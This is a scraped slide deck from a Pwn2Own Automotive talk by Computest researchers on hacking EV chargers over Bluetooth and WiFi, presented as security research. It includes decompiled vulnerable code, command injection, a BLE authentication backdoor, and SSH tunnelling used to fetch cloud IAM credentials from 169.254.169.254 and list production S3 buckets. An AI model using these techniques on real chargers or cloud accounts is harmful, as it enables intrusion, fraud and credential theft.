提斯·阿爾克馬德與哈立德·納賽爾與丹·庫珀_從低能量到高能量黑客入侵附近的藍牙EV充電器.pdf

《提斯·阿爾克馬德與哈立德·納賽爾與丹·庫珀_從低能量到高能量黑客入侵附近的藍牙EV充電器.pdf》由會員分享，可在線閱讀，更多相關《提斯·阿爾克馬德與哈立德·納賽爾與丹·庫珀_從低能量到高能量黑客入侵附近的藍牙EV充電器.pdf（96頁珍藏版）》請在三個皮匠報告上搜索。

1、Low Energy to High Energy:Hacking Nearby EV-Chargers Over BluetoothThijs Alkemade&Khaled Nassar Computest Sector 7Introduction1.Be in Bluetooth/WiFi range 2.?3.Execute arbitrary code on the chargerAbout usWe are:Khaled Nassar notkmhn Thijs Alkemade infosec.exchange/xnyhps Daan Keuper daankeuper Work

2、ing for Computest in The NetherlandsPwn2Own AutomotivePwn2Own Automotive First time January 2024 in Tokyo In scope:Tesla Infotainment systems Automotive operating systems EV chargersEV chargersLevel 2 chargers Targeted at the home market All of them come with these features Connectivity(WiFi/Etherne

3、t)Scheduling Usage monitoringEV chargersInitially,we thought chargers would be well secured:New product category Limited communication interfaces Safety regulationsSmart EV Charging Station with WiFiJuiceBox 40JuiceBox 40BLE(provisioning)WiFiJuiceBox 40Based on the Zentri IoT platform AMW006 or WGM1

4、60P module Both are ARM Cortex-M4 based MCUs Gecko OS 4.2.7(?)There is an admin interface,with some commands?Accessible in setup mode over HTTP And accessible during standard operation over port 2000,telnet style!No authenticationZentri DMSManaged IoT platform Specific hardware modules,providing Upd

5、ate management Device identification and authn,z Core OS+SDK bindings for app development Extensive APIZentri DMSJuiceBox runs on an RTOS called“Gecko OS”Note:this OS is EOL!Firmware blobs are downloadable!We could investigate these before the device arrivedJuiceBox 40(CVE-2024-23938)Gecko OS logs m

6、essages when certain events occur It is possible to change the format of these messages using a set variable command Limited to 32 characters per message template including a terminating NULL byte Support for different formatting tags per event typeJuiceBox 40(CVE-2024-23938)char scratch_buffer132;c

7、har formatted_msg_buffer192;char*dst=formatted_msg_buffer;/.if(format_tag=t)&(print_timestamp_to_string(scratch_buffer,1)=SUCCESS)memcpy(dst,scratch_buffer,10);dst10=;dst11=|;dst12=;memcpy(dst+13,scratch_buffer+11,8);dst21=:;dst22=;dst=dst+23;*dst=0;JuiceBox 40(CVE-2024-23938)What if we provide mult

8、iple t tags?At most 15 times,each using up 23 bytes 15*23=345 bytes,while the stack allocated buffer is 192 bytes long No canaries,no ASLR,but some limitations on allowed byte valuesWhat about BLE?Secondary processor for BLE Communicates with the WGM160P over SPI Exposes a BLE Serial Port Profile se

9、rvice Allows for retrieving and setting system variables Used during provisioning to set WiFi credentialsJuiceBox 40Provisioning mode fallbackDeauth the device from the provisioned WiFi AP Device will fall back into provisioning mode!Use BLE SPP service to retrieve/set WiFi credentials!The“fix”AC Wa

10、llbox Commercial(MAXI US AC W12-L-4G)Autel MaxiCharger Autel MaxiChargerWiFi Bluetooth 4G Ethernet RFID LCD touch screen RS485 port Runs FreeRTOSAutel MaxiChargerLots of labeled test points(TX/RX)Multiple internal USB ports with unknown purpose Spread out across many componentsAutel MaxiChargerAutel

11、 MaxiChargerMain CPU UARTRandom internal micro-USB ports?Getting the firmware1.App pairs with the charger 2.App asks the charger the current version of the firmware for each component 3.App submits this to a cloud server Later:1.App asks the server for updates 2.Server sends back a list of obfuscate

12、d URLs for each component that is not up to date 3.App downloads new files 4.App transfers files to charger over BLEFirmware URL obfuscation fInfo:AHR0CHM6L79zM75lDS1jZW50CmfsLTeuYW1hEm9uYXDzLmNvBS9kZWZhDWx0LmVuZXb7B2RlDS9mrnAXJtD2f7ZS85MdRkNdYxmMWM=,fileName:Firmware_ECC0101_V1.35.00.aut,fileSize:9

13、70659,firmwareId:_UNI_OTA_ECC0101,firmwareName:Charge Control Module,firmwareVersion:1.35.00,needReboot:true,note:,upgradeDuring:180,upgradeOrder:5Is it just base64?Getting the firmwareCustom base64 alphabetA a a A B b b B 7 y y 7 Getting the firmwareXOR with 256-byte key?Nope Addition instead of XO

14、R?Almost?Getting the firmwareciphertext=(plaintext XOR key1)+key2Autel MaxiCharger(CVE-2024-23958)if(packet&packet_length=32)log(A_Ble_Bus,2,536,auth msgrn);memcpy(appAuthData,packet,sizeof(appAuthData);get_password(passwordHashData);memcpy(randomNumbers,app_random,4u);memcpy(&randomNumbers4,charger

15、_random,4u);retrieveAuthToken(randomNumbers,passwordHashData,cpAuthData);for(k=0;k Autel MaxiCharger(CVE-2024-23958)if(response12)response12=0;sha256(backdoorToken,0 x20u,hashed,0);sha256(hashed,0 x20u,hashed,0);sha256(hashed,0 x20u,hashed,0);memcpy(backdoorToken,hashed,sizeof(backdoorToken);retriev

16、eCpAuthData(randomNumbers,backdoorToken,cpAuthData);for(m=0;m authentication succ,%drn”,v15);Autel MaxiCharger(CVE-2024-23958)log(A_Ble_Bus,2,641,authbd succrn);Authentication“backdoor”Autel MaxiCharger(CVE-2024-23959)Post-authentication buffer overflowchar stack_buffer60;/sp+50h bp-120h BYREFbzero(

17、stack_buffer,60);if(a1).else qmemcpy(v13,(int*)aU,sizeof(v13);sub_80C38D4(v13,17);memcpy(stack_buffer,ble_buffer,ble_buffer_length);os_printf_maybe(byte_80F4768);os_printf_maybe(chargingCtrlParam.chargingCtrl=0 x%xrn,*(_DWORD*)stack_buffer);os_printf_maybe(chargingCtrlParam.chargingMode=0 x%xrn,*(_D

18、WORD*)&stack_buffer4);os_printf_maybe(chargingCtrlParam.chargingParam=%drn,*(_DWORD*)&stack_buffer8);os_printf_maybe(chargingCtrlParam.accountBalance=%drn,*(_DWORD*)&stack_buffer12);.Autel MaxiChargerBinary exploitation on easy mode:No stack canaries No ASLR No limitations on character set Many save

19、d registers on the stack Since its FreeRTOS,cleanup and continuation was the only challenging partAutel MaxiCharger(CVE-2024-23967)Buffer overflow when decoding base64char base64_decoded1024;/sp+B0h bp-418h BYREFinitialize_string(data);v7=parse_json_message(a1,a2,v26,a4,v24,data);if(string_equal(v26

20、,Reboot).if(v7=1)c_string=get_c_string(data);os_printf_maybe(strData:%s,c_string);memset(base64_decoded,0,sizeof(base64_decoded);data_string=(char*)get_c_string(data);data_base64_decode(data_string,base64_decoded);os_printf_maybe(data_base64_decode:%s,base64_decoded);ChargePoint Home FlexChargePoint

21、 Home FlexBT+BLE(provisioning)WiFi Runs LinuxChargePoint Home Flex2018-Kaspersky Lab reportChargePoint Home FlexGetting firmwareChargePoint Home FlexGetting firmwareJTAG+gdb to get U-Boot shell Modify kernel boot args to use/bin/sh as init Dump block devices with netcat ChargePoint Home FlexData flo

22、w through IPC to other servicesChargePoint Home FlexCommand injection in wlanapp snprintf(command,0 x100u,/usr/sbin/wpa_passphrase%s%s|grep psk=|tail-1|cut-c6-,&msg-ssid,&msg-password);popen_res=popen(command,r);ChargePoint Home FlexProvisioning mode fallbackExactly the same as the JuiceBox 40New bu

23、gChargePoint Home FlexChargePoint Home FlexWe wanted a new bug,probably had to be something using WiFi Only two connections:TLS(OCPP)to the management server Outgoing SSH SSH was very interesting,but well cover that later!ChargePoint Home Flex/opt/etc/coul/cps.conf:Url=https:/172.16.110.201:343/gs/p

24、gm.php WsUrl=wss:/homecharger-:443/ws-prod/panda/v1 WsKey=/var/config/.keys/ca.crt AuthUrl=https:/172.16.50.197:343/gs/pgm KioskUrl=http:/172.31.254.10:80/gsemb_in/pgm.php CACertificateFile=/var/config/.keys/ca.crt CertificateFile=/var/config/.keys/system.crt KeyFile=/var/config/.keys/system.key Key

25、Type=PEM VerifyHostName=1 MaxEnqueueFailures=40ChargePoint Home FlexCURLOPT_SSL_VERIFYHOST is a“footgun”in curl:0:disabled 1:disabled but with some logging 2:enabled This is indeed what the charger used:it only verified that the certificate of the OCPP server was issued by ChargePoints own root,not

26、that it matched the domainGeorgiev,Martin,Subodh Iyengar,Suman Sekhar Jana,Rishita Anubhai,Dan Boneh and Vitaly Shmatikov.“The most dangerous code in the world:validating SSL certificates in non-browser software.”Proceedings of the 2012 ACM conference on Computer and communications security(2012):n.

27、pag.Pwn2Own CTF editionMade possible by:ChargePoint Home FlexChargePoint Home Flex 2,1706198695,DataTransfer,vendorId:ChargePoint,data:saddr|1|3508|1706198695|0|1|1706198695|homecharger-:443/ws-prod/panda/v1 ,ChargePoint Home Flexif(command_id=701)v91=payload136;v92=s;strcpy(char*)s,NA);if(v91)v92=p

28、ayload+136;cmd=payload+36;CTLogWhere(5,RouteToFsmInstance,4105,0 x4000,n*Executing BOOTCONTROL cmd%sn”,cmd);v94=strstr(cmd,reboot);type=reboot;if(!v94)type=bankswitch;recordReboot(v92,type,NOC,0,1);system(cmd);ChargePoint Home FlexWorth it:exploited worked and not a duplicate!Probably the fastest de

29、veloped Pwn2Own exploit in recent years:12 hours from finding the vulnerability to demonstrating it on stageChargePoint Home FlexThis was fun,but then we realise were way out of scope And no closer to finding a useful vulnerability And not familiar with the hacking laws in JapanImpactImpact:LAN acce

30、ssHacking a charger over BLE allows pivoting to the LAN Could make a botnet tooImpact:bypass safety controlsAll chargers had separate power controllers:Scheduled charging Limit maximum current High temperature shutdown Modifying this firmware could allow damaging the charger On the Autel,this firmwa

31、re could be updated!Impact:fraudChargers with payment functionality could be exploited for financial gain Overcharge for energy The Autel has“Home Charger Sharing”functionality Only the charger determines the amount billed!Impact:disruptionCompromising chargers at a large scale could have impact on

32、the energy gridTakeawaysTakeawaysHardware security researchGetting firmware is essential Non-invasive Online reconnaissance Network analysis Invasive Dumping external storage In-circuit Desoldering Using enabled debug portsTakeawaysHardware security researchExplore debugging functionality exhaustive

33、ly JTAG/SWD Built-into firmware Fault handlers Custom protocols/interfaces Consider similar(cheap)devices or dev-kitsTakeawaysHardware security researchInvest in a remotely accessible setup Smart plugs for power control Webcam for monitoring Separately managed network(s)Optional:smoke detector+smart

34、 plug comboTakeawaysHardware security researchAnd most importantly,invest in the right toolsA fantastic introductory hardware lab setup article by Bishop Fox https:/ most chargers,attention was paid to the network attack surface Attack surfaces involving the(re)provisioning process are underexamined

35、 Bluetooth Bad state transitions This probably applies to many IoT devicesTakeawaysProvisioningProvisioning should be investigated early on in the design phase Re-provisioning should be considered within the context of a reasonable attacker modelhttps:/putest.nlsector7_nlOh about that SSH connection

36、#!/bin/sh#Bring up pinned up reverse tunnel to mothership.Try forever,but back off#connection attempts to keep from wasting resources.Peg the retry time at#some max and keep trying.SERIAL_NUM=cat/var/config/cs_snSN_YEAR=echo$SERIAL_NUM|head-c 2BASE_SERVER_PORT=20000BASE_SERIAL=0SERIAL_MODULO=10000SE

37、RIAL_MINOR=expr$SERIAL_NUM%$SERIAL_MODULOREVPORT=expr$SERIAL_MINOR-$BASE_SERIALREVPORT=expr$REVPORT+$BASE_SERVER_PORT#FOR QA server please uncomment this line#REVSYSTEM=pandagateway.ev-REVSYSTEM=REVSYSTEMPORT=-p 343REVHOST=pandart$REVSYSTEMREVHOST_2016=#For 2017REVHOST_2017=.while true;do .#Connect

38、to the appropriate server based on the year code in the serial number.if$SN_YEAR=17;then#Connect to the 2017 server.#printf-Connecting to 2017 server:$REVHOST_2017n$LOG attempting connection to$REVHOST_2017 ssh-o StrictHostKeyChecking no-o ExitOnForwardFailure yes$REVSYSTEMPORT-N-T-R$REVPORT:localho

39、st:23$REVHOST_2017&.ChargePoint Home Flexssh-o StrictHostKeyChecking no-o ExitOnForwardFailure yes-p 343-N-T-R$REVPORT:localhost:23 ChargePoint Home Flexssh-o StrictHostKeyChecking no-o ExitOnForwardFailure yes-p 343-N-T-L 1337:127.0.0.1:20023 ChargePoint Home Flexssh-o StrictHostKeyChecking no-o Ex

40、itOnForwardFailure yes-p 343-N-T-L 1337:80 ChargePoint Home Flexssh-o StrictHostKeyChecking no-o ExitOnForwardFailure yes-p 343-N-T-L 1337:169.254.169.254:80 ChargePoint Home Flex$curl http:/localhost:1337/latest/meta-data/iam/security-credentials/cp-prod-ota-servers-role Code:Success,LastUpdated:20

41、24-01-25T20:21:21Z,Type:AWS-HMAC,AccessKeyId:ASIAQKPTIBNKQN2DLSML,SecretAccessKey:,Token:,Expiration:2024-01-26T02:28:42Z$aws s3 ls 2020-03-27 16:17:02 aws-athena-query-results-022521842517-ca-central-1 2019-07-17 19:23:19 aws-athena-query-results-022521842517-eu-central-1 2020-06-26 07:15:33 aws-at

42、hena-query-results-022521842517-us-west-2 2022-09-21 08:52:30 aws-cloudtrail-logs-022521842517-c3dfcdde-debug-datalake 2022-01-20 14:21:52 aws-glue-assets-022521842517-us-west-2 2020-06-26 07:53:11 aws-glue-scripts-022521842517-us-west-2 2020-06-26 07:57:20 aws-glue-temporary-022521842517-us-west-2

43、2020-06-17 04:15:13 cf-templates-aws-deployer-2-cp-prod-ap-southeast-2 2020-06-10 04:11:10 cf-templates-aws-deployer-2-cp-prod-ca-central-1 2020-06-23 04:10:57 cf-templates-aws-deployer-2-cp-prod-eu-central-1 2020-06-17 04:15:13 cf-templates-aws-deployer-cp-prod-ap-southeast-2 2020-06-23 04:10:57 cf

44、-templates-aws-deployer-cp-prod-eu-central-1 2020-07-01 13:45:27 cf-templates-aws-deployer-cp-prod-us-east-1 2020-06-26 12:17:56 cf-templates-aws-deployer-cp-prod-us-west-2 2020-06-17 04:16:26 cf-templates-fg3iuljzn1mh-ap-southeast-2 2020-06-10 04:11:28 cf-templates-fg3iuljzn1mh-ca-central-1 2020-06

45、-23 04:12:10 cf-templates-fg3iuljzn1mh-eu-central-1 2020-06-18 03:55:58 cf-templates-fg3iuljzn1mh-us-east-2 2020-06-26 12:23:09 cf-templates-fg3iuljzn1mh-us-west-2 2020-06-27 08:06:20 config-bucket-cp-prod 2019-07-19 11:36:28 cp-infra-logs 2020-07-02 15:38:44 cp-prod-022521842517-cloudtrail-logs 202

46、0-03-27 10:51:52 cp-prod-ca-datalake 2022-02-17 01:52:33 cp-prod-cardconf 2020-06-27 08:26:51 cp-prod-datalake-build-artifacts 2021-08-18 02:19:20 cp-prod-fra-nos-notification-configuration 2022-02-24 09:36:38 cp-prod-fra-nos-pricing 2022-04-02 23:15:49 cp-prod-fra-nos-reports.https:/putest.nlsector7_nl